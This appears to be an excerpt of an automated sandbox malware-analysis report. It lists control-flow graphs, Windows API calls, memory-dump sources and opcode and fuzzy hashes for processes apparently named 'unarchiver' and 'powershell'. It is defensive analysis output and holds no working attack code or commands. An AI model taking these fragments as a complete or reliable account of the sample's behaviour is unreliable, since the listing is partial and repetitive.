                                                                                      • Instruction ID: f80cbeb8d06ce1b9f4152ee475a2fb3ffbca5003c970403db795b5a7757b95e2
                                                                                      • Opcode Fuzzy Hash: f7e91a034c40b2337800009f336dfd9b61bdbca4ae85965020318cc41e681e83
                                                                                      • Instruction Fuzzy Hash: CD21A172500208AFEB219F51DD44FAAFBECEF04314F14886AE9459AA51D374E5189BA2

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 195 cfa370-cfa3cf 198 cfa3d4-cfa3dd 195->198 199 cfa3d1 195->199 200 cfa3df 198->200 201 cfa3e2-cfa3e8 198->201 199->198 200->201 202 cfa3ed-cfa404 201->202 203 cfa3ea 201->203 205 cfa43b-cfa440 202->205 206 cfa406-cfa419 RegQueryValueExW 202->206 203->202 205->206 207 cfa41b-cfa438 206->207 208 cfa442-cfa447 206->208 208->207
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA40C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: 72fc411cdef11ff25bd48fca1586fc3098f80a5e55bc359b1040bc2a112515c4
                                                                                      • Instruction ID: 1530a56411767a3cc740e11160093835adce44776961c56d596cbf388134a60a
                                                                                      • Opcode Fuzzy Hash: 72fc411cdef11ff25bd48fca1586fc3098f80a5e55bc359b1040bc2a112515c4
                                                                                      • Instruction Fuzzy Hash: AF217CB5505344AFD721CB11DC84FA2FBF8AF05610F18849AE9899B2A2D364E908CB62

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 225 cfb326-cfb39b 229 cfb39d-cfb3a5 DuplicateHandle 225->229 230 cfb3f3-cfb3f8 225->230 231 cfb3ab-cfb3bd 229->231 230->229 233 cfb3bf-cfb3f0 231->233 234 cfb3fa-cfb3ff 231->234 234->233
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFB3A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: d78949287329bf415c6aebec0bb486b7b9522a85453a73132b82aa98ceef43f2
                                                                                      • Instruction ID: 27aee622da4ac38b0a87bcf26b328cc3a790a7507767ae7a9d9da6aad4fcd3d0
                                                                                      • Opcode Fuzzy Hash: d78949287329bf415c6aebec0bb486b7b9522a85453a73132b82aa98ceef43f2
                                                                                      • Instruction Fuzzy Hash: 0D21B272500204AFEB21DF55DC44FABBBFCEF04314F14886EE9459B651D774E9088B61

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 238 cfa900-cfa986 242 cfa9ca-cfa9cf 238->242 243 cfa988-cfa9a8 SetFilePointer 238->243 242->243 246 cfa9aa-cfa9c7 243->246 247 cfa9d1-cfa9d6 243->247 247->246
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA98E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 37558dc487155c753bc5cf285a36bac4fc7ffbd0346144996e28875c940d09da
                                                                                      • Instruction ID: 3d037ac9eb6095c523ca57d0448544d8f4197da3f922b7af39e8a1ee8ee0f5e1
                                                                                      • Opcode Fuzzy Hash: 37558dc487155c753bc5cf285a36bac4fc7ffbd0346144996e28875c940d09da
                                                                                      • Instruction Fuzzy Hash: 9121C1714093846FE7228B10DC44FA2BFB8EF46724F1984EAE9849B552C274A909CB72

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 250 cfa9e3-cfaa69 254 cfaaad-cfaab2 250->254 255 cfaa6b-cfaa8b WriteFile 250->255 254->255 258 cfaa8d-cfaaaa 255->258 259 cfaab4-cfaab9 255->259 259->258
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFAA71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0

                                                                                      Control-flow Graph (rendered graph not reproduced)
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0

                                                                                      Control-flow Graph (rendered graph not reproduced)
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA8C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0

                                                                                      Control-flow Graph (rendered graph not reproduced)
                                                                                      APIs
                                                                                      • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00CFACE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreatePipe
                                                                                      • String ID:
                                                                                      • API String ID: 2719314638-0
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFAB3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 4241100979-0
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA40C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFAA71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA98E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,?), ref: 00CFA636
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath
                                                                                      • String ID:
                                                                                      • API String ID: 82841172-0
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNELBASE(?), ref: 00CFB2B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 31276548-0
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?), ref: 00CFAB3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 4241100979-0
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA8C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      APIs
                                                                                      • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00CFA1C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindNext
                                                                                      • String ID:
                                                                                      • API String ID: 2029273394-0
                                                                                      APIs
                                                                                      • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00CFACE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreatePipe
                                                                                      • String ID:
                                                                                      • API String ID: 2719314638-0
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,?), ref: 00CFA636
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath
                                                                                      • String ID:
                                                                                      • API String ID: 82841172-0
                                                                                      • Opcode ID: 2146ac5679070e52723798ed9a33d41cee64101d8319092262b2d7176ea535f1
                                                                                      • Instruction ID: 4d68f8d1cd4ea42d9204358b26ac735e8222b2509583f58ab9bc7ad169abdc0d
                                                                                      • Opcode Fuzzy Hash: 2146ac5679070e52723798ed9a33d41cee64101d8319092262b2d7176ea535f1
                                                                                      • Instruction Fuzzy Hash: 07015AB14042489FDB60CF55D984B66FBE4EF44320F18C4AAEE498B652D375A818DB62
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: e88998f4b9ec225f4ce7a9bfd766e353deb51b76640d2a06ad01bc42bb9c6332
                                                                                      • Instruction ID: db9f48b08ea4582cf6e9e893053ec4c226becdc60d2de3e5ffc13f4fffa1b0cc
                                                                                      • Opcode Fuzzy Hash: e88998f4b9ec225f4ce7a9bfd766e353deb51b76640d2a06ad01bc42bb9c6332
                                                                                      • Instruction Fuzzy Hash: 2B01D1B55002488FDB508F16D885766FBE4EF04320F18C0AADE198B752D775E908DAA2
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: c7de6fd814c73e6dc0b508e523172b8a8730ad6507172458fcf5e1aab64af638
                                                                                      • Instruction ID: 4890ce8b5d335ba9373590a0f27117d99b9c3ccb93191c5af398da99667968a3
                                                                                      • Opcode Fuzzy Hash: c7de6fd814c73e6dc0b508e523172b8a8730ad6507172458fcf5e1aab64af638
                                                                                      • Instruction Fuzzy Hash: B0F0A4754042488FDB50DF06D884765FBE4EF44724F18C09ADE094B762D375E918DA63
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00CFA7F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 14cf458ddb88df6d6c0bf63939cdf2294cac03e69a9422d1b1d0fab9275cd0cb
                                                                                      • Instruction ID: 7b18891b7a9d5671728a6e7025d3f9727499a320152444df44283495c3c458c4
                                                                                      • Opcode Fuzzy Hash: 14cf458ddb88df6d6c0bf63939cdf2294cac03e69a9422d1b1d0fab9275cd0cb
                                                                                      • Instruction Fuzzy Hash: 152104B55093C05FCB138B25DC91752BFB8EF07320F0984EAED858F2A3D2649909C762
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00CFA7F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 1341f5ecae4630e34a6c821c065a3914c980e628c04720596def47859ed73987
                                                                                      • Instruction ID: 7194452debd9b36dfe4e88b618d198f543242fe39f70d59c7557fae6399927e1
                                                                                      • Opcode Fuzzy Hash: 1341f5ecae4630e34a6c821c065a3914c980e628c04720596def47859ed73987
                                                                                      • Instruction Fuzzy Hash: 4701DFB19003448FDB50CF15D885766FBE4EF04320F18C4AADD098B682D2B9E948DAA3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6cb4cbf81d3f838d2d57b058f2a7b5f92fd38ed13e3187c0892bda0074df420
                                                                                      • Instruction ID: 7cbffcb4f6cb3043c41b7f9a510b34a909ac3b2fd9f41f7e84c4def74ef2bb67
                                                                                      • Opcode Fuzzy Hash: f6cb4cbf81d3f838d2d57b058f2a7b5f92fd38ed13e3187c0892bda0074df420
                                                                                      • Instruction Fuzzy Hash: 55B13C38701310CFD718EF64EA58F9A77B6EF88348B508429D906973A8DB719D47CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7c4f4ca0f9032a2a1bf283ba3186f52d0a230612915523be78e25adec2cb8cf
                                                                                      • Instruction ID: 6c2c179523bbed401455a8bec65cfdd5b2c9ca750eb3f65acffce7f38498695b
                                                                                      • Opcode Fuzzy Hash: b7c4f4ca0f9032a2a1bf283ba3186f52d0a230612915523be78e25adec2cb8cf
                                                                                      • Instruction Fuzzy Hash: A9118F36A10218AFDB04DBB8D848DDE7BF6FF88218B044479E205E7764DB31981A87D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f1b6cd9b4eccf5905a2c09a7dbe12daec02050fe8674e2135bb548efd10e0d8
                                                                                      • Instruction ID: ab53441b56d4cb66c3d4147fc52cd9802ec49f13f5802f1c857fb5e078569c3e
                                                                                      • Opcode Fuzzy Hash: 9f1b6cd9b4eccf5905a2c09a7dbe12daec02050fe8674e2135bb548efd10e0d8
                                                                                      • Instruction Fuzzy Hash: 840192B240D3446FD701DB14AC41C96BBF8EF86520B08856EFD488B602D326A9188BA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d650538535a13aa5924efc7a3bd4da3c7f929015bfaa345d3f1af512de93a636
                                                                                      • Instruction ID: 3be5d955c89cb9c9d8227ae4971f065b0af3e7002dbd9d0763055774193b3827
                                                                                      • Opcode Fuzzy Hash: d650538535a13aa5924efc7a3bd4da3c7f929015bfaa345d3f1af512de93a636
                                                                                      • Instruction Fuzzy Hash: 8A01A2B65093806FD702CB15AC418A2FFF8EE86230748C49FEC4987A12D225B908C7B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ec3914d0821cc3619b38e4d5393bf5b1c853b7b9e83548781191e4578933f2a
                                                                                      • Instruction ID: 96d46911ab7401853297c371414258bf8fbace44e6364d5c59a4d13c894c9700
                                                                                      • Opcode Fuzzy Hash: 6ec3914d0821cc3619b38e4d5393bf5b1c853b7b9e83548781191e4578933f2a
                                                                                      • Instruction Fuzzy Hash: A5F082B2805204AF9200DF05ED45866F7ECEF94521F54C52AFD088B701E276B9194AE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283157044.0000000000E10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e10000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bde959a6ab1194fc65f25c384079c0a480308d3d292a7054d0e09b5b52d087fb
                                                                                      • Instruction ID: 4c99511af5ec0511bdafbcc1abb66c53d03a54513158919a0ba125ce40d4e8bf
                                                                                      • Opcode Fuzzy Hash: bde959a6ab1194fc65f25c384079c0a480308d3d292a7054d0e09b5b52d087fb
                                                                                      • Instruction Fuzzy Hash: B7E092B66046044B9650DF0AEC81462F7E8EB88630758C47FEC0D8B701E236B508CAA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e6464f8092b7c67c9290faee87c4de050c8f6679283d4b41c22cc5dd8fb915c
                                                                                      • Instruction ID: ddc75fecbfdec84089ab1c8fc41cbdc943b54bfe1f07030b62ffe656f759d2df
                                                                                      • Opcode Fuzzy Hash: 4e6464f8092b7c67c9290faee87c4de050c8f6679283d4b41c22cc5dd8fb915c
                                                                                      • Instruction Fuzzy Hash: 21E0DF61F142941FEB04EAB85450AEE7FA5DF92064FD544BAC008D7781EA35CC0783D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce10796c4f4289929df274e7197ab7e69edb1ef4c7587b54c93957c321c666ce
                                                                                      • Instruction ID: ad7e3cd7b1db4451bd0aec6e083c46ed13b194bf24dcbb46554f797417fdf34b
                                                                                      • Opcode Fuzzy Hash: ce10796c4f4289929df274e7197ab7e69edb1ef4c7587b54c93957c321c666ce
                                                                                      • Instruction Fuzzy Hash: AFD017B1F142282B9B48EAB99850DEEBBEADF84164B95847D9009E7740EE35DC0687C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7db6fe857e4cfc0738804d67d5fe04e2a852c6198348650c86875667190f3dc
                                                                                      • Instruction ID: 9da13b5c1da1f5df8a229dc108e0f9df7a7db19b76c21f6878aaef20e9cf6c81
                                                                                      • Opcode Fuzzy Hash: e7db6fe857e4cfc0738804d67d5fe04e2a852c6198348650c86875667190f3dc
                                                                                      • Instruction Fuzzy Hash: E1E086242493C04FDB0393349459EE53F715F83204F8E90E9C044DBAE3C5648C96D791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282593956.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cf2000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dec4a988f157a0fcb9eb40e1a23c8365e0983f2c52f431ef1dd6e47a00a4c02d
                                                                                      • Instruction ID: b80498eaf717976a2bf26327bb880411017739b26c87b0302f94d678cfcd43bc
                                                                                      • Opcode Fuzzy Hash: dec4a988f157a0fcb9eb40e1a23c8365e0983f2c52f431ef1dd6e47a00a4c02d
                                                                                      • Instruction Fuzzy Hash: FAD05E792056C14FE3279B1CC1A4BA53BE4AB51714F4B44FEA8008F763C7A8DA81E611
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282593956.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cf2000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cbc49cac1e5308fab01a9b6d0dd5a20a9f4990a322452be7a0d4506ba4b3d520
                                                                                      • Instruction ID: bd1a1a201bf18bcf013c42fe5e5232d17ae1dde6240593283e50beabc20446b9
                                                                                      • Opcode Fuzzy Hash: cbc49cac1e5308fab01a9b6d0dd5a20a9f4990a322452be7a0d4506ba4b3d520
                                                                                      • Instruction Fuzzy Hash: 73D05E742006854BC725DA0CC2D4FA937E8AB40714F1644ECAC208B772C7A8D9C8CA01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5da44ef18324024a75c0b2f78129e458252f96adbd548be9a56c3768fdd9907
                                                                                      • Instruction ID: b877a8515507dfb922c192920dc74957fcd05fd9a88dcc215d455e45ed0040ca
                                                                                      • Opcode Fuzzy Hash: a5da44ef18324024a75c0b2f78129e458252f96adbd548be9a56c3768fdd9907
                                                                                      • Instruction Fuzzy Hash: 44C012302003048BD704A768D45DF2573D667C0308F85C46494085B395CA70ECC1D6C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1363454977.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacbf0000_powershell.jbxd
                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                      • Instruction Fuzzy Hash: A7E01A31B0C809CFEA68DF0DE0409E973E1EB9933172141B7D14EC7561CA22EC569BC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1466369495.00007FFAACA2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA2D000, based on PE: false
